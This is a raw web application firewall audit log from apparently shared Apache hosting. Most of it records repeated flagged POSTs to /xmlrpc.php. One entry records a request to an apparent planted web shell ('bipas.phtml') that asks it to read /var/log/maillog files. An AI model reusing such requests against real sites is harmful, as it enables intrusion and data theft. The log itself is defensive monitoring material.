"/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4Z_lIoq-7Cj_2-ZLTSjAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948926116020 1006064 (- - -) Stopwatch2: 1749948926116020 1006064; combined=2161, p1=381, p2=1407, p3=65, p4=47, p5=164, sr=98, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa7d0726-Z-- --aafee90f-A-- [15/Jun/2025:06:26:27.575064 +0530] aE4aOsQgjKnP_-nTjoBpnAAAAAM 167.250.235.41 47250 127.0.0.1 7081 --aafee90f-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 685 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --aafee90f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --aafee90f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4aOsQgjKnP_-nTjoBpnAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948986664051 911095 (- - -) Stopwatch2: 1749948986664051 911095; combined=2479, p1=410, p2=1624, p3=77, p4=55, p5=197, sr=120, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aafee90f-Z-- --ceacb075-A-- [15/Jun/2025:06:27:27.264219 +0530] aE4adhkoa9Lad8nP7KOEhAAAABA 167.250.235.41 40034 127.0.0.1 7081 --ceacb075-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ceacb075-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ceacb075-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4adhkoa9Lad8nP7KOEhAAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949046211627 1052660 (- - -) Stopwatch2: 1749949046211627 1052660; combined=161239, p1=349, p2=1518, p3=77, p4=64, p5=79654, sr=95, sw=132, l=0, gc=79445 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ceacb075-Z-- --a536d424-A-- [15/Jun/2025:06:29:24.826535 +0530] aE4a64dVJK-eDwr5Vlo2kwAAAAc 167.250.235.41 50418 127.0.0.1 7081 --a536d424-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 689 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a536d424-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a536d424-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4a64dVJK-eDwr5Vlo2kwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949163847841 978785 (- - -) Stopwatch2: 1749949163847841 978785; combined=2695, p1=511, p2=1743, p3=69, p4=54, p5=200, sr=135, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a536d424-Z-- --abf1f505-A-- [15/Jun/2025:06:30:24.611936 +0530] aE4bJ8QgjKnP_-nTjoBp5AAAAAM 167.250.235.41 39932 127.0.0.1 7081 --abf1f505-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --abf1f505-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --abf1f505-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4bJ8QgjKnP_-nTjoBp5AAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949223580224 1031796 (- - -) Stopwatch2: 1749949223580224 1031796; combined=2370, p1=414, p2=1522, p3=62, p4=52, p5=200, sr=127, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --abf1f505-Z-- --79583259-A-- [15/Jun/2025:06:31:24.855466 +0530] aE4bY4dVJK-eDwr5Vlo2tAAAAAc 167.250.235.41 57554 127.0.0.1 7081 --79583259-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --79583259-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --79583259-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4bY4dVJK-eDwr5Vlo2tAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949283872065 983484 (- - -) Stopwatch2: 1749949283872065 983484; combined=2516, p1=407, p2=1662, p3=82, p4=57, p5=191, sr=97, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79583259-Z-- --d4bdbb19-A-- [15/Jun/2025:06:32:25.104039 +0530] aE4boIdVJK-eDwr5Vlo2wwAAAAc 167.250.235.41 55940 127.0.0.1 7081 --d4bdbb19-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d4bdbb19-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d4bdbb19-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4boIdVJK-eDwr5Vlo2wwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949344068686 1035428 (- - -) Stopwatch2: 1749949344068686 1035428; combined=2134, p1=393, p2=1397, p3=48, p4=40, p5=157, sr=122, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4bdbb19-Z-- --e2c8586d-A-- [15/Jun/2025:06:34:24.939334 +0530] aE4cF4dVJK-eDwr5Vlo27wAAAAc 167.250.235.41 46930 127.0.0.1 7081 --e2c8586d-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 685 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e2c8586d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e2c8586d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4cF4dVJK-eDwr5Vlo27wAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949463884548 1054852 (- - -) Stopwatch2: 1749949463884548 1054852; combined=2174, p1=378, p2=1412, p3=66, p4=47, p5=169, sr=111, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2c8586d-Z-- --cfb8474f-A-- [15/Jun/2025:06:35:24.733840 +0530] aE4cU8QgjKnP_-nTjoBqRQAAAAM 167.250.235.41 56218 127.0.0.1 7081 --cfb8474f-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cfb8474f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cfb8474f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4cU8QgjKnP_-nTjoBqRQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949523652668 1081237 (- - -) Stopwatch2: 1749949523652668 1081237; combined=2350, p1=368, p2=1592, p3=64, p4=45, p5=174, sr=96, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cfb8474f-Z-- --8d6e5844-A-- [15/Jun/2025:06:35:51.674876 +0530] aE4cbyeXHcLENIHhuFcwxgAAAAU 44.207.69.106 57074 127.0.0.1 7081 --8d6e5844-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/maillog.processed.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.207.69.106 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8d6e5844-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --8d6e5844-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4cbyeXHcLENIHhuFcwxgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749949551670422 4506 (- - -) Stopwatch2: 1749949551670422 4506; combined=2442, p1=414, p2=1881, p3=39, p4=35, p5=73, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d6e5844-Z-- --7e357f72-A-- [15/Jun/2025:06:36:25.302008 +0530] aE4ckB6N9C2vdY7GQBUxPQAAAAY 167.250.235.41 54534 127.0.0.1 7081 --7e357f72-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 687 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7e357f72-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7e357f72-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4ckB6N9C2vdY7GQBUxPQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949584301202 1000869 (- - -) Stopwatch2: 1749949584301202 1000869; combined=2569, p1=517, p2=1703, p3=53, p4=42, p5=159, sr=147, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e357f72-Z-- --c2d0bb4e-A-- [15/Jun/2025:06:37:25.184314 +0530] aE4czCeXHcLENIHhuFcw3gAAAAU 167.250.235.41 32784 127.0.0.1 7081 --c2d0bb4e-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 688 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c2d0bb4e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c2d0bb4e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4czCeXHcLENIHhuFcw3gAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949644215156 969224 (- - -) Stopwatch2: 1749949644215156 969224; combined=2335, p1=356, p2=1581, p3=73, p4=49, p5=171, sr=101, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c2d0bb4e-Z-- --f9d26710-A-- [15/Jun/2025:06:39:24.753008 +0530] aE4dQz9o8tFLnaQ0S_4zgAAAAAQ 167.250.235.41 59836 127.0.0.1 7081 --f9d26710-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f9d26710-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f9d26710-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4dQz9o8tFLnaQ0S_4zgAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949763767364 985736 (- - -) Stopwatch2: 1749949763767364 985736; combined=2168, p1=351, p2=1364, p3=93, p4=61, p5=193, sr=105, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9d26710-Z-- --d72a5f25-A-- [15/Jun/2025:06:40:25.296519 +0530] aE4dgB6N9C2vdY7GQBUxhwAAAAY 167.250.235.41 50032 127.0.0.1 7081 --d72a5f25-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d72a5f25-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d72a5f25-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4dgB6N9C2vdY7GQBUxhwAAAAY"] Apache-Handler: 